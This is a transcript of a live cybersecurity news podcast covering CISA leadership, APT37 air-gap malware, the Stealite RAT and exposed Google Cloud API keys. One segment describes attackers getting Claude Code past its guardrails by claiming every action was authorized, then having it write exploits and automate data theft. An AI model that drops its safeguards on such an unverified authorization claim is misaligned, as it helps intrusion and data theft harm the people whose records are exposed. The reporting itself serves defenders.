A
What's up, everybody? Good morning. Welcome to Monday, March 2, 2026, coming to you live from the Buffer Osier Flow Studio. This is Simply Cyber's Daily Cyber Threat Brief podcast. I'm your host, Dr. Gerald Auger, and over the next hour you are going to be all up to date on the top cyber news stories of the day, while myself and the Simply Cyber community go beyond the headlines to help you level up as an absolute boss in this industry. Get comfortable, get your coffee and get ready, because we're about to tear the lid off this. All right, good morning, everybody. Yes, we're gonna go through eight stories of the day. Marcus Kyler will be hitting the elliptical and Dam IDK is here for the first time. So yeah, everybody, this is going to be a great show. I'm super pumped. Also want to say a quick programming note again: not a deepfake, right? No, no editing here, whatever. Some of the stories that are being queued up, I don't research or prep for the stories in advance, so I don't know the details of the story, but I do have to open the tabs. And based on what I'm seeing, DJ B Sec just dropping squad. Good to see you, DJ B Sec. As always, a bit of an uptick in activity with DJ B Sec's presence in the chat these last couple days. Guys, it looks like some of the stories are retreads from last week, stories that we already kind of went down the rabbit hole on and I gave my thoughts and insights. So if that does happen to be the case, DJ B Sec on the ones and twos has reached into the crates and pulled out a couple stories for us to go. Justin Crypto, blue badge, 47 months. Let's go. Jay Gold, almost four years as a squad member. Damn, dude. Thank you, Jay Gold. Guys, if you're here for the first time, whether it's your first time live (good morning, Jenny), whether it's the first time live because normally you watch on replay or the audio podcast app of your choice, or it's your first time at all with Simply Cyber and you're like, what is this? Let me check it out.

Drop a #firsttimer in chat. What's up, Chuggy671? Good to see you guys. Do me a favor, drop a #firsttimer in chat if you meet that qualification, basically your first time here. As I said, @DamIDK, at D-A-M IDK, says it's their first time live, and I definitely want to welcome them. We have a special sound effect, a special emote that we drop in there. So don't be shy with first timers. Guys, I want to quickly shout out the fact that every episode of the Daily Cyber Threat Brief is worth half a CPE. What's up, Ms. Julian? Good to see you on this fine Monday morning, guys. Isaac. Okay. Isaac Gura, 5440. Isaac Gura, 5440 squad members, let's welcome Isaac Gura. Welcome to the party, pal. Isaac, I hope you have a great experience today on the show. Guys, every single episode of the Daily Cyber Threat Brief is worth half a CPE. So say what's up in chat. You appear on the stream, you are live, you are part of the show. This is not an AI manufactured webinar. This is not pre-recorded and made to look real. What we're doing here is legit, authentic, organic, and in the world of AI slop, it's nice to see some meatbag flesh and blood up in this piece. So say what's up in chat. Grab a screenshot. So basically, like Stones Fan right here, Rob, like Almighty NB, see how he's saying "Good Morning CPE3226 1079"? Grab a screenshot of that. You'll also notice the title of this episode says today's date, Top Cyber News, March 2. It also says episode 1079. Grab a screenshot of that every day. Tomorrow will be 1080, then 1081 the day after that. File it away. Once a year, you'll just have a ton of screenshots. Submit your CPEs to your professional certification body organizations, and if and only if they audit you, you will have the receipts of those screenshots. Simple as that. It's yet another value that we try to bring to you as part of Simply Cyber community membership. Now I want to say what's up to the cosmic cowboy, Jesse Johnson, getting up early in the mod chat.

Really quick, guys, since we only have three sponsors this month, can we just take a beat and say thank you to the mods? I'm dropping Mod Love. If you're a squad member, there's a Mod Love emote. It's next to John McLean in the emote tray. The mods, dude, they are volunteer based. They care about the community. And guys, it takes a village to run Simply Cyber, I gotta tell you. And they keep the Discord clean. They keep the chat clean. Jenny Housley was running around like Thor with the hammer, making sure that nonsense was not tolerated. Like, just thank you so much, mods. Appreciate all of you, and I know the community does also. All right. So we did CPEs, we did the stories, we did first timers. Let me just take a quick minute and say thank you to the stream sponsors, those who enable me to bring this show to you. Quick reminder: Wednesday, Thursday, Friday of this week, we will be reporting live from Zero Trust World. Let me know in chat. I'll ask now, but I'll probably try to talk more about it. You're welcome, GRC Guardrail. I spent like an hour or two yesterday trying to start prepping for going to Zero Trust World. Running the Daily Cyber Threat Brief, running this podcast from a hotel room, just myself, it's not a lot of work, right? I've taken screenshots and showed you. It's not super difficult. When I do an at-conference, multi-person podcast panel with audio, video, lighting, it is insane. It's a lot. So if you guys are interested, I can put together kind of a crude film of what it takes to get this gear together and sent to the conference. Let me know if that's something you guys are interested in. I'm not sure. I want to share one more thing before we talk about the sponsors. Okay, guys, I released this video over the weekend and it is straight crushing it. Check this out if you're interested. Where's the thumbnail for this thing, bruh? I don't know where the thumb... Oh, here it is. Look at this. This video right here.

I did some wild stuff with Claude Code and LinkedIn. I don't care where you are in your career journey, you could be day one or day 1000. Doesn't matter if you're, you know, an ICS/OT person or a GRC person. This video can legit help anyone using Claude Code and your personal LinkedIn data. This is a freaking awesome video. I saw Code Brew already talk about it. I don't normally pump my own videos like this, but this one can help you. So please, please check it out for your own benefit. If you don't want to, like, go incognito. If you're like, ah, I'm not going to do anything someone tells me to do, fine, whatever. This video to me is awesome. And it's actually... look at this. This is another thing. Really quickly before we get into it, look at the dashboard. Look at it. See right here, right here. It's my top video ranking by views. This video, 6.9% CTR rate. That's insane, dude. All right guys, before I get into it, let me say shout out and thank you to... I know. Hey, DJ B, I did say thank you in the video to DJ B Sec. So shout out to that guy for making the... like, he's my muse. Shout out to the stream sponsors who enable me to bring this show to you every single day. Couldn't do it without them. Holla to Antisyphon Training. Antisyphon Training: disrupting the traditional cybersecurity training industry by offering high quality, cutting edge education to everyone. Remember, this Wednesday at noon, for free, you can learn how to prep incident response for AI. This is a lot of value even if you're a GRC person, because you're going to be asked, like, where should we be thinking about this? What's the strategy here with doing AI? Most people are thinking about how do we deploy AI safely. How about what happens when there's a problem with AI? Have you thought about that? Classic NIST CSF stuff. Everybody's focused at left of boom. You should be thinking left and right of boom. Be the all star on your team. Go to this training, one hour.

I'm telling you, you're going to leave with mad value. I'm going to drop a link in chat. Thank you to Antisyphon for putting on this content. Also want to say holler to Flare. Flare Academy is offering a two week free trial. If you go to simplycyber.io/flare now, you can sign up and get validated to confirm you're actually a good person to get access to their platform. Their cyber threat intelligence platform is amazing. They go into the dark web. They go into, you know, kind of evil Telegram channels. They data mine all the stuff and then they put it in an interface where you can query. You can find compromises in your environment that your protection technologies did not detect. Go to simplycyber.io/flare now. You will not be sad that you did. Quick note from ThreatLocker and then it's on to the news. I want to give some love to the Daily Cyber Threat Brief sponsor ThreatLocker. Do zero day exploits and supply chain attacks keep you up at night? Worry no more. You can harden your security with ThreatLocker. Worldwide companies like JetBlue trust ThreatLocker to secure their data and keep their business operations flying high. ThreatLocker takes a deny by default approach to cybersecurity and provides a full audit of every action allowed or blocked for risk management and compliance. Onboarding and operation is fully supported by their US based Cyber Hero support team. Get a free 30 day trial and learn more about how ThreatLocker can help prevent ransomware and ensure compliance. Visit threatlocker.com/dailycyber. All right, everybody, do me a favor. Sit back, relax, and let's let the cool sounds of the hot news wash over all of us in an awesome wave. I will see you at the mid roll. From the CISO Series, it's Cybersecurity Headlines.
B
These are the Cybersecurity Headlines for Monday, March 2, 2026. I'm Steve Prentice. Gottumukkala ousted as CISA director. This departure follows widespread dissatisfaction with the agency's performance
A
Okay, hold on. All right, hold on. So remember I told you I thought that the stories from last week were... CISO Series started doing this thing called Department of No, and they stick it in the headline news, and it screws everything up for me. Hold on one second. Give me a second. Let me clear out these stories. Talk amongst yourselves. I'll give you a topic: Dr. Pepper. Not a doctor or a pepper. Discuss. You get to see how the sausage is made here. Hold on one second. Nothing to see here. I mean, actually, it's everything to see. You're seeing how the show is made. All right, and as we were.
B
...over the past year, with particular bipartisan criticism aimed directly at Madhu Gottumukkala's leadership. He will now take on a new role at the Department of Homeland Security as Director of Strategic Implementation. The role of CISA Director will now be filled by current agency Executive Director for Cybersecurity Nick Anderson, who will hold this position as interim leader. Ron Wyden
A
All right, hold on. I had never heard of this guy, Gottumukkala. Like, you can see him right here. Both sides of the aisle. So everybody thinks this guy's terrible at his job. It's not political. Apparently, you know, Democrats, Republicans, young, old, they all agree this dude is a stiff. Okay? However, a DHS security official says he's done a remarkable job in a thankless task. Oh, my God. I feel like this is like most of us. Most of us have done a remarkable job in a thankless task. "I don't see why you need more budget, Gerry. We didn't get hacked last year. I don't see why you're asking for a raise. We didn't get hacked last year." Yes, we didn't get hacked last year because I'm doing my job, CEO. Bro, you are so dumb. You are really dumb. For real. All right, so this guy served as CIO under Kristi Noem, if you didn't know. CISA is an agency, like a sub-agency under DHS. So DHS controls who's in leadership in CISA. This is where Jen Easterly was, of course. And you know, when the Trump administration came in, they had different views. So Sean Plankey's nomination. So it seems like he was on his way out anyways, because he was just kind of a placeholder. Let's see. Robert Costello is the CISA CIO. Okay, okay, whatever. This doesn't feel like it's going to impact us much. A lot of these high level, high ranking executive changes always seem to be politically motivated. But you know, both sides of the aisle thought this guy was, you know, not great. Classic government gig, though. He's not being relieved of duty, he's just been given a different job, kind of failing upward. So, all right, I don't... to me, this is like a nothing burger story. Yes, it's interesting, but I don't really know these people. I don't know if this is going to influence one thing or another. The only thing I could think of is CISA is responsible for, or heavily involved in, election security.

So you know, you could put on a conspiracy theory tinfoil hat and think that this might be a long term play to get something installed for the November elections. Again, I have no evidence to support that one way or the other. So some dude I've never heard of has been relieved of duty, and I'm probably going to forget this guy's name and the story by tomorrow afternoon. I'll just remember.
B
...blocks Rudd confirmation to lead Cyber Command and NSA. The Oregon senator, quote, pledged to block a vote confirming Lt. Gen. Joshua Rudd as the new head of both U.S. Cyber Command and the National Security Agency, citing his lack of digital warfare and intelligence experience. A letter written by Senator Wyden was included in the Congressional Record on Wednesday. He added that Lt. Gen. Rudd is, quote, not qualified for this job, end quote, and that, quote, when it comes to the cybersecurity of this country, there is simply no time for on the job learning, end quote. Hackers weaponize Claude Code in
A
So this is Lieutenant General, which means he's a three star general in the Army, and he's talking about being in charge of US Cyber Command, and I don't know if NSA is the same. Yeah, see how it says US Cyber Command and the NSA? This is like a joint, dual hatted role. You know, Ron Wyden, who's a Democrat out of Oregon, he is heavily involved in cyber related policy, quite often privacy related. He comes straight out and says he's not qualified for this job. Okay. Hey, have you been wondering, like, when you're interviewing for jobs and you don't get feedback from the employer when you don't get hired? Ron Wyden's happy to give you some feedback. Not qualified for the job. He says that you can't learn on the job, etc. Here's my thing. Let's see. He's opposed to the confirmation because of the vague answers he gives, etc. Dude, the NSA and US Cyber Command have been running without a chief for over a year since Donald Trump fired General Timothy Haugh. Timothy Haugh was not fired for performance, in case you didn't know. It's not really politically motivated, but I guess you can Google DEI and federal administration policies around DEI and what happens if you don't toe the line. Okay, so here's the thing. This guy, this is Ron Wyden right here. They're looking to install this Lieutenant General Rudd as the leader of NSA and US Cyber Command. His argument is the guy's not qualified because he doesn't have enough background in cybersecurity. Really quickly, guys, you know, as much as I'm pro privacy, pro cyber, and I can understand Ron Wyden's argument here, let's take a beat for a second and be like, who are you going to install as the leader of the NSA and US Cyber Command that's fully qualified as a cyber operator? Like, this guy is a three star general, which means he probably has like 30 years of experience, which means he's probably, at the youngest, like 50. The youngest.

Okay, he's probably older than that. I mean, I don't know who's the dream candidate for Ron Wyden in this situation? You know what I'm saying? And again, I'm not trying to dunk on Ron Wyden, because I actually appreciate it and I'm all for it, but I'm just being realistic. Like in our industry, okay, when you go to apply for a job and they're like, hey, it's an entry level job, but you need like 25 years of experience, we get pissed off. I feel like Ron Wyden's kind of doing that right now with this guy. Like, I don't know. Again, if you're the leader of an agency, typically you surround yourself with really great, competent people. If I was going to be the leader of a business, like, I don't want to be great at marketing, great at sales, great at this, great at that. I want to surround myself with people that are great at those things, and then I'm the leader. That's what an executive officer does. That's what a chief does. So I don't necessarily agree that this guy has to be, like, hands on keyboard, being able to boot up Parrot OS and hack into the Matrix. So anyways, we'll see where it goes. The fact that the agencies haven't had a leader for over a year is problematic. If it is somewhat political, like, you know, this Lieutenant General Rudd has really extreme views on certain things around privacy or mass surveillance or something like that, that's fine. And maybe Ron Wyden doesn't want to come out and say that. But also, final thoughts really quickly. As just a US citizen, dude, a lot of times I've seen these confirmation hearings. All sorts of gnarly stuff comes out about the individual, and then they still get the job, right? Supreme Court justices, leaders in appointed positions. Like, I don't know about you guys, but, like, I...

I don't know the last time someone was appointed and had to go through a congressional confirmation hearing and they didn't get the job. So, all right. Oh, Space Tacos, 33 months, almost three years. Space Tacos, GRC mafia. Thank you.
B
...Mexican government cyber attack. According to researchers at cybersecurity startup Gambit Security, 10 Mexican government bodies and one financial institution were compromised in this attack, starting with the country's tax authority in late December. In analyzing the attacker logs, Gambit assessed that, quote, over 1,000 prompts were sent to Claude Code to mount the attacks, and that the information was also passed to OpenAI's GPT-4.1 for analysis. And the researchers added, AI didn't just assist. It functioned as the operational team, writing exploits, building tools, and automating exfiltration. The attack bypassed Claude's guardrails by convincing it that all actions were authorized. As a result, the attacker exfiltrated over 150 gigabytes of data, including civil registry files, tax records, and voter data, exposing 195 million identities in the process.
A
All right?
B
North Korean hackers use new malware to
A
All right, so we've seen this before, okay? Now, in case you haven't been following, right, Mexico is, like, under attack by cartels, kind of. I don't know. Again, I haven't been following that story wicked closely, so I don't know if that's still a thing. AI Mafia. Shall we play a game? Thank you, Code Brew. Brent, always nice. Okay, so dude, we've already seen this. China, China, Anthropic attack, multi stage. Look at this. So yes, this story was from, I don't know, last December, I think, maybe November 13, 2025. You know why I remember? Because the infographic. Oh yeah, get some of this. Okay, so China allegedly... oh my God. China allegedly used Claude to do multiple phases of a cyber attack, including iterating, lateral movement, etc., with the human in the loop kind of operating at the helm. So this has already been well developed and well precedented. AI breaking through guardrails is not difficult. I mean, easily. It sounds like in this story all they said was "you're authorized to do everything you want." That was satisfying for Anthropic. Claude Code is wicked powerful. Again, reminder: I literally did a video using Claude Code. Not to attack the Mexican government, but how to attack your career. Oh, LinkedIn. How to basically weaponize data from LinkedIn to help you crush it. So go check that video out again. Nice plug, Gerry. So the Mexican government got hacked. Who did it? That's the question I want answered, right? A thousand prompts were sent to Claude Code to mount the attacks. GPT-4.1. So they weren't even on... let's see. AI functioned as the operational team, writing exploits, building tools, automating exfil, which is exactly what China did here. Maybe it's the same group, I don't know. So here's another thing. Whoever was operating or piloting this AI as it was weaponized was probably a senior red teamer. And to me, this is one of those, at least right now, one of those things where we talk about human in the loop.

It's not always human in the loop to make sure the AI doesn't do something dangerous or controversial. It's literally human in the loop because the human knows what to tell the AI to do. You know, this story sucks because the Mexican government got hacked and a lot of people's data got exfilled. But this is a perfect example of showing you what happens when you have a senior person in the seat using AI as a tool to move faster, be more efficient. Of course, this is terrible for junior engineers trying to get into the industry, because essentially AI is doing the grunt work, which is what we typically have the juniors do. Let's see. I'm trying to see. Oh yeah, this is the first... right, exactly. They, in the story, talk about the Chinese government or Chinese threat actors doing these things. All right? And then the story just goes on to talk about previous examples of Mexico getting hacked. All right, so the TL;DR for everybody is, you should expect this. This is like the new norm. It's fringe right now. I would almost call this, like, what is it? The adoption curve, hype cycle. If you don't know about this thing, this is a pretty famous thing. It's the adoption curve hype cycle, right? Innovation trigger. Everybody gets all hyped up and geeked up about it, and then a bunch of people realize it's not as awesome as it seems. And so this is kind of like using AI for offensive security operations. There's been a couple examples. Very innovative people, very senior people are using it. So we're going to see a massive uptick in it. A lot of people are going to be all geeked up, frothed up, trying to use Anthropic or OpenAI for offensive operations. And then basically this crashing down is going to show the trough of disillusionment. It's going to show a bunch of script kiddies who don't know how to pilot the AI correctly failing miserably.

And then the slope of enlightenment, as it kind of comes over the hump here, is as it gets documented, people start sharing techniques, documenting processes, etc. This is what's happening. Also, I want to point out this is exactly what happened with OpenClaw. As someone who's been using OpenClaw, my level of impressed is not matched to the hype cycle of all these YouTubers who are losing their mind about OpenClaw being the next great shakes. My OpenClaw instance is like a 50/50, does good work or doesn't do good work, okay? To protect from this type of attack, guys, all you got to do... I mean, not all you got to do, but listen, TL;DR, if you've been trying to hide, you know, security through obscurity, if you've been trying to make it work on a budget, dude, at this point you've got to get basic fundamentals in place. EDR, EDR, MFA, tabletop exercises, identity protection. Identity is the new perimeter. You need foundational cybersecurity in place or you are going to have an AI rip your face off, okay? Also including detection techniques. And once you're ready, I mean, you're going to have to use AI to combat AI. There's no way a human can combat AI.
B
...breach air gapped networks. The group APT37 has been using newly uncovered tools to move data between Internet connected and air gapped systems, spread via removable drives, and which conduct covert surveillance. The campaign, named Ruby Jumper, is being analyzed by cloud security company Zscaler. Although there are many components in this campaign, it starts with tricking a human user into activating a Windows LNK shortcut, which then enables removable drives to become infected. According to the researchers, quote, the malware turns removable storage devices into a bi-directional covert command and control relay, end quote.
A
All right, Run Fish asked the question. I'm using a bunch of acronyms. I am trying to consciously spell out acronyms to make it more accessible to everybody. So I didn't do that a moment ago, apologies. I said EDR. EDR is endpoint detection and response. EDR is basically an agent that runs on endpoints, or like, you know, your users' computers, laptops, workstations. Carl in Accounting's machine, it's got an EDR agent on it. CrowdStrike, SentinelOne, Microsoft Defender, these are EDR solutions. The reason you want EDR, endpoint detection and response: it's effectively like antivirus, anti-malware. When bad happens on the machine, EDR is the one that detects it and notifies. The reason it's not called anti-malware is because EDR is designed for enterprise, or for businesses, where it reports back to a centralized dashboard where a security professional is waiting. So the detect, the endpoint detection, yes, it goes to the controller, and then response: the person at the dashboard can hit a button and isolate that endpoint, or quarantine it, or whatever. I also said MFA. That's multi-factor authentication, and that is basically having a second or third factor beyond username and password. All right, APT37, aka North Korea, has entered the chat and has a tool that can attack air gapped systems. Now, an air gapped system is a networked system, but it's not on the Internet. Okay, so think of it as its own little pocket. You see air gapped systems at industrial plants. Imagine an energy plant that is all networked together so the engineers in the main control room can see the health of all the systems, but it's not on the Internet. Air gapping is a great security control. It reduces a lot of attack surface, because you're not on the Internet, unless a threat actor can jump the air gap. A famous example of jumping the air gap is Stuxnet.

When the United States and Israel attacked Iran, not this past weekend, but actually back in 2009, I think, where they elegantly and sophisticatedly attacked the Iranian nuclear facilities in Natanz. They had a malicious USB brought in. So that's one way to attack an air gapped network: bring your own payloads on a USB device. Okay. And it says here that, yeah, removable drives. Okay, so North Korea putting a new spin on a classic. Removable drives, as in USB drives. I don't know why they're saying it in such a fancy way. So it's being called Ruby Jumper. All right, hold on. I'm figuring it out. Physical isolation is achieved at the hardware level by removing all connectivity. Yeah, 100%, dude. If you could have an air gapped system, like a truly air gapped system, your job as a cyber professional becomes a lot easier. It doesn't happen very often anymore because it is being integrated and overlaid with OT/ICS systems. OT/ICS, that's... ICS is industrial control system. OT is operational technology. Think of something where you push a button and it physically moves a vent to allow gas to escape or something, or changes the temperature of water. So there's five malicious tools in the toolkit. How do they infect it, though? That's what... all right, the victim opens a malicious Windows shortcut file. So they get some type of phishing email, like with an attachment or whatever. The LNK file again. Block LNK files at the firewall, please. Like, what are we doing? Don't allow it to detonate on the box. You can use EDR to not allow LNK files to detonate. It deploys a PowerShell script that extracts payloads embedded in the LNK file. So the entire malware is self contained within the email or the file itself. So it doesn't have to reach out to C2. It launches a decoy document. This is social engineering, to make it a little bit more difficult for the victim to detect that something bad has happened.

All right, all right, so the first payload is a C2. It reaches out to C2, download. I'm not getting to air gapped yet. I mean, this is basically standard stuff, right? I infect you, payload. First thing it does is pull down a second stage payload via C2. Hello. According to DJ B Sec, good point: you can also stop general users from running PowerShell on their machine. That will absolutely nerf this attack from happening. All right, so it runs a Ruby file. That's why it's called Ruby whatever, because Ruby is a programming language. Remember Ruby on Rails? I'm pretty sure the Metasploit framework is written in Ruby. All right, all right, so... oh, my gosh, look at this. So I guess what happens here is the machine gets infected, and then if you plug in a USB drive, the USB drive will try to capture everything it can. So, all right, a couple things here. Number one, pretty clever. Thank you, North Korea. Second of all, guys, TL;DR, right? Listen, if you have an air gapped system, then you should have controls around who's allowed to plug what into it, right? You can't just have people running up and plugging in USB devices, right? First of all, that's a policy you should implement. Second of all, this seems... yes, Space Tacos. This is borderline sexy to me. If you're an advanced persistent threat actor, like North Korea, right? This is a deliberate attack. This is not sending it out to thousands and thousands of people and hoping you get a strike. This is sent very deliberately with the hopes that someone will do this. Now, I don't get why they put so much effort into this. Personally, if you compromise an asset or an endpoint, then you need the victim to plug in a USB drive, which is not part of the social engineering attack. So the likelihood of the USB drive getting plugged in is not... I don't know what the percentages are, but then...

Then you need the person to then plug in that malicious USB drive into an air gapped system. So, to me, there's multiple steps that have to happen here that the threat actor cannot control through social engineering. So it's like, I don't know, I feel like you're playing three-card monte, or like the three shells with the pea under one of them that you see grifters do in New York City, like, oh, hey, which one? Which one? Which one's the queen? Which one's the queen? All right, put your money down. Like, I don't know, man. Attacking air gapped systems is not easy, which is why air gapping is a great control. But this here, right here, seems more like... I don't know, like, the likelihood of successfully exploiting the air gapped system is not high, as far as I can tell. So in Stuxnet, for example, they didn't compromise an endpoint. They literally sent a USB device and said it was a patch, a critical patch for, like, a Siemens thing that they needed to plug in. Right. So the social engineering in the Stuxnet attack directly targeted the engineer and told them to plug the USB device into the air gapped system. This one, it's like... I don't know, man, like a magic trick. Like, you need the victim...
B
Best friends.
A
Yep. Oh, John V with a super chat. Hold on. In January, a federal jury in San Francisco convicted Google software engineer Linwei Ding, 38, on seven counts of economic espionage and seven counts of theft of trade secrets for stealing confidential data related to AI tech for the benefit of the CCP. Just John, feeling strong. Thanks for the super chat. Shall we play a game?
B
Huge thanks to our sponsor, Adaptive Security. This episode is brought to you by Adaptive Security, the first security awareness platform built to stop AI-powered social engineering. Deepfakes aren't science fiction anymore. They are a daily threat. So here's a quick tip. If your voicemail greeting is your real voice, switch it to the default robot voice. A few seconds of audio can be enough to clone you. Adaptive helps teams spot and stop these AI-powered social engineering attacks. And you can learn more at adaptivesecurity.com. Those are the two words, Adaptive Security, together, dot com.
A
All right, guys, we only have three sponsors in the month of March, so there's no sponsor to read here at the mid-roll. Alrighty. Hey, shout out to all y'all, thanks for being here. I hope you're enjoying the show. Damn IDK, as a first-timer, let us know what you think. I want to say thank you to the stream sponsors. These three sponsors, ThreatLocker, Antisyphon, Flare, are 2026 sponsors. They sign up for the whole year. They believe in Simply Cyber's mission. They want to be part of it. They want to support the channel and support the community. Thank you, ThreatLocker, Antisyphon and Flare. Guys, every single day of the week has a special segment, and on Mondays, ThreatLocker has gone a little extra and they have sponsored the Simply Cyber Community Member of the Week, which basically means ThreatLocker allows me to give the Community Member of the Week a hundred-dollar Amazon gift card. I. I have done Simply Cyber merch in the past, which I'm happy to do, but at the end of the day, not to sound like a baby, but it becomes. It becomes more complicated because then I have to get the sizes, I have to go, I have to order the stuff. It's just, it's a whole thing. Amazon gift card. Super easy, everybody. It's the right size. It fits everybody. So every day of the week, I find somebody in the community to highlight. Now, today's member. I. I can't necessarily highlight on LinkedIn like I normally do, but here's what I can do. Let me do this really quickly. All right, hold on. Today's Community Member of the Week. I don't even know, honestly, if he is in the show. He's definitely active on the server. Hold on. I'm taking a screenshot of his account, and then I'm gonna bring it up on stage. Here we go. Ladies and gentlemen, I present you with your Simply Cyber Community Member of the Week. This is Kepler. Now, Kepler is very active in the Simply Cyber Discord server. Kepler, if you're in chat right now, say what's up. All right, here we go.
All right, Roswell UK, music cut. Simply Cyber Community Member of the Week is Kepler. Kepler is very active in the Simply Cyber Discord server and has been very proactive in wanting to keep the server healthy and safe. We had some issues a couple weeks ago on the server. Kepler reached out to me. We had a conversation. I presented it to the mod team. We all agreed that the issue needed to be addressed, and Kepler went back to doing his thing. So I just want to let you guys know, as I've said in the past, it takes a village, and I genuinely appreciate Kepler for doing what Kepler does. Okay, holla, holla, holla. All right. Oh, do we have a wrecking ball? Hold on. Yeah, I mean, if you're a non-US citizen, I will definitely get you a reward. Okay. Like, you're not gonna get hosed. All right, so there we go. Let's do this. Let me see really quickly. We want to do the la la la la's for sure. All right, let's do this really quickly. Let's get our la las on. Trying to get Alpha Sierra back in the fold. All right, here we go. If you got the la la la la's, let it fly. All right? And hey, good luck to Lionheart on the CySA+ tomorrow. Billy Orellana with the new job. All right, let's finish strong.
B
Stealite RAT delivers both data theft and ransomware. This new remote access Trojan, spelled S T E A L I T E, Stealite, is currently available for sale on cybercrime networks and enables double extortion attacks on Windows machines by bundling ransomware and data theft, along with credential and cryptocurrency stealers, live surveillance, and a whole host of other illicit capabilities, all controllable from a centralized dashboard. This product was discovered by researchers from BlackFog, who described it as, quote, fully undetectable, end quote, and the best Windows RAT in November 2025. It works across Windows 10 and 11 with an Android module reportedly in development. The researchers stated that with this product, quote, data theft begins at the moment of connection, end quote.
A
All right, so Stealite, remote access Trojan or remote access tool, I don't know, doesn't seem like Trojan. But listen, this thing operates in the browser, and as soon as it connects, it steals stored passwords, session cookies, anything in the browser. Again, you should not be saving your password in the browser. You can't help but store cookies in the browser because that's how the web works. But I will tell you, something like this that, you know, runs in the browser and steals session tokens. Again, I mentioned this earlier. Like, this is why I like Flare and I recommend Flare to people, because even if Stealite gets your creds, your creds get stolen and you don't know, it'll literally show up in Flare's threat intelligence platform. Because they're harvesting all that data. They know where to go look for the C2 and the data exfil, so they can see all that stuff. Now the question immediately becomes, to me as a GRC pro and as a cyber pro, like, the question immediately becomes, how is initial infection? Right, like, we need to stop the initial infection. All right, all right, there's more. This is malware as a service, right? Like, they're allowing functionality. You can get a platinum package and you can do advanced tools like extorting money from the victim because you encrypt their stuff. Hidden RDP, Windows Defender disable. Right, okay, how is, how is initial infection? All right. Double extortion requires malware for initial access and exfil. All right, Stealite puts both in the same interface, and the automated credential harvesting means data theft fires before the operator even interacts with the dashboard. All right. I mean, this is, this is powerful malware, guys. Like, this malware kind of assumes some techniques that an attacker would want to do anyway and does it for you, kind of like AI. My question is, like, how do you get it?
Yeah, the Stealite one, there's a promotional video demonstrating the tool's capabilities on YouTube. So basically they're marketing the tool itself on YouTube. I want to know how to. The question is, how does it get on the machine? Right? Like, are they seeing an uptick in, you know, phishing emails with this payload, or. I guess, I guess what they're doing here is they're just noting that this is a malware as a service that's for sale on the dark web, and different threat actors who purchase it are going to do different things to get it on your machine. So it's called Stealite, or S T E A L I T E here. I'm kind of curious about this, bro. YouTube. All right, hold on. All right, so I mean, I don't know, man. Like, it says it's on YouTube, but, like, I'm on YouTube and I'm lurking, I'm looking for it, and I don't see it. This is from a cybersecurity company. So either YouTube took it down. I assume YouTube took it down. I don't know. There's no IOCs for this one either. Let me see this really quickly. So unfortunately, the name Stealite is also similar to something else that owns the. I'm sorry that I'm kind of not doing a great job of hosting right now. I'm looking for IOCs for Stealite. Doesn't look like it. BlackFog is the one who did the research itself. So hopefully they have a. Yeah, hold on. BlackFog here. Here's how I. This is how I do my job, okay? This is how I would do it. Like, this is telemetry, this is information, this is threat intelligence coming out. This particular tool is super useful, super powerful. It is getting a lot of traction as far as the criminal, you know, criminal ecosystem goes. So now I, as a CISO, I'm like, okay, what is this really? Because I need to, for my business, I'm not just the CISO, I'm also the friggin' SOC analyst. So, like, I need to know what the IOCs are so I can look in my SIEM. But what is it? Like, just saying, oh, Stealite, like, that doesn't do anything. All right, let's see.
B
What.
A
All right, I don't have this. I'm not going to make you guys watch me fumble about it.
B
Just.
A
It's annoying, okay? It's annoying because what we need is actual information and data points and IOCs, not just, like, oh, this thing has seen an uptick. So as a homework assignment, I would, I guess, ask folks, if you want, check this story out. If anyone finds some IOCs, holler at me, please. Yes, Devin Grady, I'm the CISO. So I'm gonna throw it over the fence to my threat intel analyst, and then I'll put on my glasses and I'll be like, I'm the threat intel analyst, getting hit with a bunch of threat intel. All right.
B
Google Cloud API keys exposed with Gemini access after API enablement. New research from Truffle Security has found that Google Cloud API keys, typically designated as project identifiers for billing purposes, could be abused to authenticate to sensitive Gemini endpoints and access private data. The researchers discovered nearly 3,000 Google API keys, identified by the prefix AIza, embedded in client-side code to provide Google-related services like embedded maps on websites. Truffle Security found that creating a new API key in Google Cloud defaults to unrestricted, meaning it is applicable for every enabled API in the project, including Gemini.
A
Okay, so the issue here, and by the way, Google can fix this, right? So you as a practitioner, I mean, you could go in and change the, I guess the name of your. So if you've enabled the Gemini API on your Google Cloud project, then you are potentially in scope of this. Okay. The problem is people are writing web apps and vibe coding them. So there's a lot of likelihood that this issue is present in your environment. If you've got people doing this, if they scrape the website, they can get the API key, and they can search for the string AIza, which I know sounded like yowza. Where is that? Hold on, where is it? Yeah, AIza, you can see right here your API key, it starts with AIza, which is something that people can, you know, Ctrl-F or grep on. The key is unrestricted, which basically means it can access all the services, essentially. At the end of the day, this is a permissions-based issue. The default config allows permissions for everything, which means if a threat actor gets it, they have your API key, which then means they can use that tool to get access to running queries or prompts using your billing code. Also, whatever other services there are, they might be able to use that API key to query your data sets and pull your data, resulting in data leakage or data compromise. I, I don't 100% know that for a fact. All right, so the researchers found 2,800 live keys. If they found it that easy, like, others can find it. Yeah, so here's, here's the TL;DR. Number one, Google can fix this. They did this with S3 buckets back in the day. Google can fix this by making the API key not unrestricted by default, making you define what its scope is and forcing you to choose unrestricted. That doesn't mean that Carl in accounting isn't going to go ahead and just be like, yeah, I'm going to spin this up. Unrestricted sounds good. Sounds like a frictionless experience, so you still could handle that. Second of all, in your own environment.
If you do have these API keys, there's probably a centralized. I'm not an AWS expert, so anyone who's an AWS expert, fact-check me on this one. But I would assume, or I'm sorry, not AWS, Google Compute. I would imagine if you're a tenant administrator, a global administrator, again, I don't know what the title is in GCP, but if you're a super admin, you should be able to see the API keys, or at least a portion of them, in some type of, like, asset inventory interface in Google Compute administrator mode. The AIza is what they're saying all the keys start with that are a problem. So you should be able to look at those and see what they're scoped for. If they are currently scoped unrestricted, you can change those permissions to hopefully limit the amount of abuse. Also, you might be able to see where the API keys are being used. Also, if you see an uptick in your billing, right? So there's. This is another, like, I'll give you two tips, okay? This is two, like, tips from the trenches. Number one, it's not ridiculous to make relationships with the finance office or the CFO and say, hey, if you see unusual billing, right? Like, so our, our Google Compute expense is always, like, three grand a month? Not exactly, but around three grand. Sometimes it's 2,500, sometimes it's 3,500. And then in February we got a bill for $14,000. You've got to let me know, because that means that there's something bad happening in the tenant, okay? So you can use billing to be essentially an indicator of compromise. The second thing I want to tell you about is, oh, this is a reality. And honestly, guys, no, no. BW5542. Yeah, a little late when there's an uptick in billing, for sure. But like, I mean, better late than never, right? I mean, I'd rather detect it at some point than just continue racking up these bills. Remember, everybody, you. You can't 